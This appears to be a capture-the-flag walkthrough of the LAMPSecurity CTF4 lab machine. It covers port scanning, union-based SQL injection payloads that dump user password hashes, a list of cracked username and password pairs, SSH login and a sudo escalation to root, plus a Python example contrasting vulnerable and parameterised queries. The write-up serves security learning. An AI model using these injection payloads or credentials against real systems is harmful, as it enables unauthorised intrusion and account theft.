• VM: LAMPSecurity: CTF4
  • Goal: Gain root access
  • Approach: solve without automated exploitation tools

Target Discovery

nmap -sn 192.168.172.200-254
(screenshot: target discovery)
Our target: 192.168.172.237

Port Scanning

nmap -p- -A 192.168.172.237
(screenshot: port scanning)
  • Port 22: OpenSSH 4.3
  • Port 80: Apache httpd 2.2.0

The scan also found 5 hidden directories on port 80: /mail/, /restricted/, /conf/, /sql/ and /admin/. With an old Apache and that many directories exposed, the web server is the obvious place to start.

Enumeration

First, poke around the website for a bit.

(screenshot: web homepage)

Next, the hidden directories. /conf returned an error, and /restricted, /mail and /admin all require a login. The hidden directory /sql, however, exposes the database schema:

(screenshot: sql schema)

This is valuable information: there is a table named user that stores user_name and user_pass.

SQL Injection

After some more poking around, the blog page appears to be vulnerable to SQL injection: appending a single quote (') to the id value produces a database error:

(screenshot: vulnerability to SQL injection)

Knowing from the schema that blog_id is the id column, I then confirmed the injection with the following id value, which succeeded (the page returned content selected by my own SQL condition):

id=1000+or+blog_id%3d2-- (1000 or blog_id=2--)
(screenshot: sql injection test)

Exploitation

It's time to retrieve the contents of the user table. Based on the schema, the blog table has 4 fields. Let's check which of them are used for display:

id=1000+union+select+1,2,3,4-- (1000 union select 1,2,3,4--)
(screenshot: checked fields used)

Oops, an error. It looks like the number of columns is not 4, so I need to find out how many columns the blog query actually has. A few tests with an ORDER BY clause will tell:

id=1000+order+by+4-- (1000 order by 4--)
id=1000+order+by+5-- (1000 order by 5--)
id=1000+order+by+6-- (1000 order by 6--)

order by 4 and order by 5 worked fine; order by 6 returned an error. So the query has 5 columns, not 4. Back to checking which columns are displayed:

id=1000+union+select+1,2,3,4,5-- (1000 union select 1,2,3,4,5--)

Great. Columns 2, 3, 4 and 5 are displayed. Now it's time to retrieve the user table's contents:

id=1000+union+select+1,user_pass,3,4,user_name+from+user-- (1000 union select 1,user_pass,3,4,user_name from user--)
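The blog page's query is not shown in the write-up. As an added example (not code from the post or the VM), the following Python/sqlite3 snippet rebuilds a five-column blog table and a user table with user_name and user_pass (all rows are constructed), then feeds the same union payload to a string-concatenated query and to a parameterised one, to show why the first leaks the user table and the second does not.

```python
import sqlite3

# Constructed sample schema mirroring the write-up: a blog query with 5
# columns and a user table with user_name / user_pass (rows are made up;
# the hashes are MD5 of "password" and of the empty string).
SCHEMA = """
CREATE TABLE blog (blog_id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT);
CREATE TABLE user (user_name TEXT, user_pass TEXT);
INSERT INTO blog VALUES (1, 'Hello', 'First post', 'admin', '2009-01-01');
INSERT INTO blog VALUES (2, 'Second', 'Another post', 'admin', '2009-01-02');
INSERT INTO user VALUES ('alice', '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO user VALUES ('bob', 'd41d8cd98f00b204e9800998ecf8427e');
"""

# The extraction payload from the write-up, URL-decoded.
PAYLOAD = "1000 union select 1,user_pass,3,4,user_name from user--"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, blog_id):
    # String concatenation: whatever arrives in ?id= becomes part of the SQL,
    # so a UNION with a matching column count appends rows of our choosing.
    sql = "SELECT * FROM blog WHERE blog_id = " + blog_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, blog_id):
    # Hardened form: validate the type, then bind the value as a parameter.
    # The database never parses the input as SQL, so the UNION is inert.
    try:
        bid = int(blog_id)
    except ValueError:
        return []
    return conn.execute("SELECT * FROM blog WHERE blog_id = ?", (bid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Vulnerable path: rows of (1, user_pass, 3, 4, user_name) come back.
    for row in vulnerable_lookup(db, PAYLOAD):
        print("leaked:", row[4], row[1])
    # Safe path: the payload is rejected and nothing is returned.
    print("safe:", safe_lookup(db, PAYLOAD))
```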

Nice. This yields 6 username and password-hash pairs. The hashes are 32 hex characters, so very likely MD5. All of them were looked up (cracked) successfully on md5decrypt.net:

dstevens: ilike2surf
achen: seventysixers
pmoore: Homesite
jdurbin: Sue1978
sorzek: pacman
ghighland: undone1

SSH Connection

With these passwords in hand, I tried them against SSH. We are lucky: the passwords stored in the database are the same passwords used to log in to the system.

Privilege Escalation

Time to enumerate the system for a way to get root. First, find out more about the current user with the id command:

id
(screenshot: check user info)

The user 'dstevens' is a member of the admins group. Next I check what he is allowed to run with sudo, and sure enough he can run sudo su, which grants a root shell:

sudo -l
sudo su

root shell achieved!

Thanks to the author, madirish2600, for the box LAMPSecurity: CTF4.
